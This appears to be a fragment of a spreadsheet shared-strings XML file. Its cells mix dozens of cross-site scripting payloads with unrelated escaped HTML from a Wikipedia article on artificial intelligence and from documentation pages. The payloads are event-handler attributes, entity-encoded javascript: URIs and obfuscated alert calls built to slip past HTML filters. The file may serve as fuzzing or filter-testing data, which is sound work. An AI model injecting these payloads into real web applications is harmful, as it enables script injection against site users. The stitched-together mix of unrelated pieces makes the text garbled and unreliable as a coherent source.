    <t>&lt;image src=validimage.png onloadstart=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite class="citation book"&gt;&lt;a href="/wiki/Nils_Nilsson_(researcher)" class="mw-redirect" title="Nils Nilsson (researcher)"&gt;Nilsson, Nils &lt;/a&gt; (2009). &lt;i&gt;The Quest for Artificial Intelligence: A History of Ideas and Achievements &lt;/i&gt;. New York: Cambridge University Press. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-521-12293-1" title="Special:BookSources/978-0-521-12293-1"&gt;&lt;bdi&gt;978-0-521-12293-1 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=The+Quest+for+Artificial+Intelligence%3A+A+History+of+Ideas+and+Achievements&amp;amp;rft.place=New+York&amp;amp;rft.pub=Cambridge+University+Press&amp;amp;rft.date=2009&amp;amp;rft.isbn=978-0-521-12293-1&amp;amp;rft.aulast=Nilsson&amp;amp;rft.aufirst=Nils&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;a style="animation-name:x" 									onanimationend="alert(1)"&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;dl style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/dl&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-297"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-297"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;acronym onpointerup=alert(1)&gt;XSS&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;a draggable="true" ondragenter="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;th style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;time onpointerleave=alert(1)&gt;XSS&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;209–210 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onpaste="alert(1)" contenteditable&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;spacer id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;tt onmouseenter="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Soft_robotics" title="Soft robotics"&gt;Soft robotics &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;li style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;data onkeydown="alert(1)" contenteditable&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;/form&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=39" title="Edit section: Cybersecurity"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;time onmouseenter="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>a=alert,a(1)</t>
  </si>
  <si>
    <t>&lt;dialog onmouseup="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Allen, Gregory (6 February 2019). &lt;a rel="nofollow" class="external text" href="https://www.cnas.org/publications/reports/understanding-chinas-ai-strategy"&gt;"Understanding China's AI Strategy" &lt;/a&gt;. &lt;i&gt;Center for a New American Security &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Center+for+a+New+American+Security&amp;amp;rft.atitle=Understanding+China%27s+AI+Strategy&amp;amp;rft.date=2019-02-06&amp;amp;rft.aulast=Allen&amp;amp;rft.aufirst=Gregory&amp;amp;rft_id=https%3A%2F%2Fwww.cnas.org%2Fpublications%2Freports%2Funderstanding-chinas-ai-strategy&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;script type="text/javascript" src="_static/js/modernizr.min.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;output id=x tabindex=1 onfocus=alert(1)&gt;&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mental_representation" title="Mental representation"&gt;Mental representation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Analysis_of_algorithms" title="Analysis of algorithms"&gt;Analysis of algorithms &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;span onkeypress="alert(1)" contenteditable&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;progress onpointerup=alert(1)&gt;XSS&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav&amp;#x0A;ascript:alert('');"&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onkeydown="alert(1)" contenteditable&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;script style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;rb id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;main onmouseout="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;em onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/em&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;h1 id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;a onmousemove="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;sup id="cite_ref-FOOTNOTERussellNorvig2009_7-1" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTERussellNorvig2009-7"&gt;&amp;#91;7&amp;#93; &lt;/a&gt; &lt;/sup&gt; Some argue that some kind of (currently-undiscovered) conceptually straightforward, but mathematically difficult, "Master Algorithm" could lead to AGI.</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="http://www.techinsider.io/mysterious-artificial-intelligence-company-elon-musk-investment-2015-10"&gt;"The mysterious artificial intelligence company Elon Musk invested in is developing game-changing smart computers" &lt;/a&gt;. &lt;i&gt;Tech Insider &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20151030165333/http://www.techinsider.io/mysterious-artificial-intelligence-company-elon-musk-investment-2015-10"&gt;Archived &lt;/a&gt; from the original on 30 October 2015&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 October </t>
  </si>
  <si>
    <t>&lt;cite draggable="true" ondragenter="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;script src="_static/js/tooltipster.bundle.min.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onpointermove=alert(1)&gt;XSS&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onkeypress="alert(1)" contenteditable&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;picture onbeforecut="alert(1)" contenteditable&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="plainlinks hlist navbar mini"&gt;&lt;ul&gt;&lt;li class="nv-view"&gt;&lt;a href="/wiki/Template:Philosophy_of_mind" title="Template:Philosophy of mind"&gt;&lt;abbr title="View this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;v &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-talk"&gt;&lt;a href="/wiki/Template_talk:Philosophy_of_mind" title="Template talk:Philosophy of mind"&gt;&lt;abbr title="Discuss this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;t &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-edit"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Template:Philosophy_of_mind&amp;amp;action=edit"&gt;&lt;abbr title="Edit this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;e &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;track onblur=alert(1) tabindex=1 id=x&gt;&lt;/track&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="footer-places-privacy"&gt;&lt;a href="https://foundation.wikimedia.org/wiki/Privacy_policy" class="extiw" title="wmf:Privacy policy"&gt;Privacy policy &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;s onblur=alert(1) tabindex=1 id=x&gt;&lt;/s&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;b style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;output onmouseenter="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Biorobotics" title="Biorobotics"&gt;Biorobotics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;content oncopy="alert(1)" contenteditable&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;content id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;samp style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;p ondrop=alert(1) contenteditable&gt;drop here&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;sub onmouseover="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;See also </t>
  </si>
  <si>
    <t>&lt;rp id=x tabindex=1 onactivate=alert(1)&gt;&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;meta ondrop=alert(1) contenteditable&gt;drop here&lt;/meta&gt;</t>
  </si>
  <si>
    <t>top[/al/.source+/ert/.source](1)</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;sup id="cite_ref-133" class="reference"&gt;&lt;a href="#cite_note-133"&gt;&amp;#91;130&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;header onbeforepaste="alert(1)" contenteditable&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/McCarthy_91_function" title="McCarthy 91 function"&gt;McCarthy 91 function &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rt draggable="true" ondragstart="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Computationalism" class="mw-redirect" title="Computationalism"&gt;Computationalism &lt;/a&gt; and &lt;a href="/wiki/Functionalism_(philosophy_of_mind)" title="Functionalism (philosophy of mind)"&gt;Functionalism (philosophy of mind) &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;svg onmouseout="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onpointermove=alert(1)&gt;XSS&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Ronald, E. M. A.  and Sipper, M.  &lt;a rel="nofollow" class="external text" href="https://drive.google.com/file/d/0B6G3tbmMcpR4VnpOX0xxazFNbjA/view?usp=sharing"&gt;What use is a Turing chatterbox? &lt;/a&gt;, Communications of the ACM, vol. 43, no. 10, pp.&amp;#160;21–23, October 2000. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;hr oncontextmenu="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;option id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/option&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>Stochastic methods for uncertain reasoning:</t>
  </si>
  <si>
    <t>&lt;slot draggable="true" ondragend="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;tt onbeforecopy="alert(1)" contenteditable&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;take the center square if it is free. Otherwise, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-European_Platform_for_Digital_Humanism-350"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-European_Platform_for_Digital_Humanism_350-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;section id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Genetic_programming" title="Genetic programming"&gt;Genetic programming &lt;/a&gt; and &lt;a href="/wiki/Genetic_algorithms" class="mw-redirect" title="Genetic algorithms"&gt;genetic algorithms &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Learning_classifier_system" title="Learning classifier system"&gt;Learning classifier system &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;menu onmouseenter="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; 2017 </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;shadow id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;em onpointerdown=alert(1)&gt;XSS&lt;/em&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Learn how to find and get rid of memory leaks in your crawler.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;figure onpointerleave=alert(1)&gt;XSS&lt;/figure&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Logic"&gt;Logic </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;audio style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Educational_technology" title="Educational technology"&gt;Educational technology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;link onfocusin=alert(1) id=x tabindex=1 style=display:block&gt;</t>
  </si>
  <si>
    <t>&lt;hr onmouseout="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;set onpointerover=alert(1)&gt;XSS&lt;/set&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;details id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;audio id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;basefont id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Behavior_selection_algorithm" title="Behavior selection algorithm"&gt;Behavior selection algorithm &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Philosophy_of_artificial_intelligence" title="Philosophy of artificial intelligence"&gt;Philosophy &lt;/a&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td class="plainlist" style="padding:0 0.1em 0.4em"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Art"&gt;Art </t>
  </si>
  <si>
    <t>&lt;noscript onpointerup=alert(1)&gt;XSS&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;br onkeypress="alert(1)" contenteditable&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;img onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/img&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;big onkeydown="alert(1)" contenteditable&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;nav style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;label onload=alert(1)&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;950–952, &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Cyc-164"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Cyc_164-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;th id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/th&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;s id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/s&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;address draggable="true" ondragend="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;table onkeydown="alert(1)" contenteditable&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;script src="https://assets.readthedocs.org/static/javascript/readthedocs-doc-embed.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;div class="section" id="built-in-services"&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onpointerup=alert(1)&gt;XSS&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;input type=image onloadstart=alert(1) src=validimage.png&gt;</t>
  </si>
  <si>
    <t>&lt;blink onmousedown="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFKurzweil1999" class="citation book"&gt;&lt;a href="/wiki/Ray_Kurzweil" title="Ray Kurzweil"&gt;Kurzweil, Ray &lt;/a&gt; (1999). &lt;a href="/wiki/The_Age_of_Spiritual_Machines" title="The Age of Spiritual Machines"&gt;&lt;i&gt;The Age of Spiritual Machines &lt;/i&gt; &lt;/a&gt;. Penguin Books. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-670-88217-5" title="Special:BookSources/978-0-670-88217-5"&gt;&lt;bdi&gt;978-0-670-88217-5 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=The+Age+of+Spiritual+Machines&amp;amp;rft.pub=Penguin+Books&amp;amp;rft.date=1999&amp;amp;rft.isbn=978-0-670-88217-5&amp;amp;rft.aulast=Kurzweil&amp;amp;rft.aufirst=Ray&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;&lt;a href="/wiki/John_McCarthy_(computer_scientist)" title="John McCarthy (computer scientist)"&gt;McCarthy, John &lt;/a&gt; (1988). "Review of &lt;i&gt;The Question of Artificial Intelligence &lt;/i&gt;". &lt;i&gt;Annals of the History of Computing &lt;/i&gt;. &lt;b&gt;10 &lt;/b&gt; (3): 224–229. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Annals+of+the+History+of+Computing&amp;amp;rft.atitle=Review+of+The+Question+of+Artificial+Intelligence&amp;amp;rft.volume=10&amp;amp;rft.issue=3&amp;amp;rft.pages=224-229&amp;amp;rft.date=1988&amp;amp;rft.aulast=McCarthy&amp;amp;rft.aufirst=John&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;iframe onmouseleave="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;menu onpaste="alert(1)" contenteditable&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;ul onpointerdown=alert(1)&gt;XSS&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;a onmouseover="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;rp onkeydown="alert(1)" contenteditable&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTERussellNorvig2009-7"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-FOOTNOTERussellNorvig2009_7-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-FOOTNOTERussellNorvig2009_7-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Deep recurrent neural networks </t>
  </si>
  <si>
    <t>&lt;body id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;mark onbeforecut="alert(1)" contenteditable&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;footer id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/footer&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;source onclick="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;font onload=alert(1)&gt;&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;b draggable="true" ondrag="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;table onpointerleave=alert(1)&gt;XSS&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption id=x tabindex=1 onfocus=alert(1)&gt;&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onblur=alert(1) tabindex=1 id=x&gt;&lt;/bgsound&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onblur=alert(1) tabindex=1 id=x&gt;&lt;/h1&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;u onbeforepaste="alert(1)" contenteditable&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;footer onpointermove=alert(1)&gt;XSS&lt;/footer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-81"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-81"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Concurrency_(computer_science)" title="Concurrency (computer science)"&gt;Concurrency &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;legend draggable="true" ondragend="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;summary onload=alert(1)&gt;&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Biomedical_cybernetics" title="Biomedical cybernetics"&gt;Biomedical cybernetics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;legend onmouseout="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;td onmouseout="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;body style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;area onmouseout="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;header onkeydown="alert(1)" contenteditable&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 /&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=South+China+Morning+Post&amp;amp;rft.atitle=Will+your+job+still+exist+in+10+years+when+the+robots+arrive%3F&amp;amp;rft.date=2017&amp;amp;rft_id=http%3A%2F%2Fwww.scmp.com%2Ftech%2Finnovation%2Farticle%2F2098164%2Frobots-are-coming-here-are-some-jobs-wont-exist-10-years&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;thead ondblclick="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;style draggable="true" ondragleave="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;template id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onmouseenter="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Machine_ethics"&gt;Machine ethics </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;article ondragover=alert(1) contenteditable&gt;drop here&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;area style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/area&gt;</t>
  </si>
  <si>
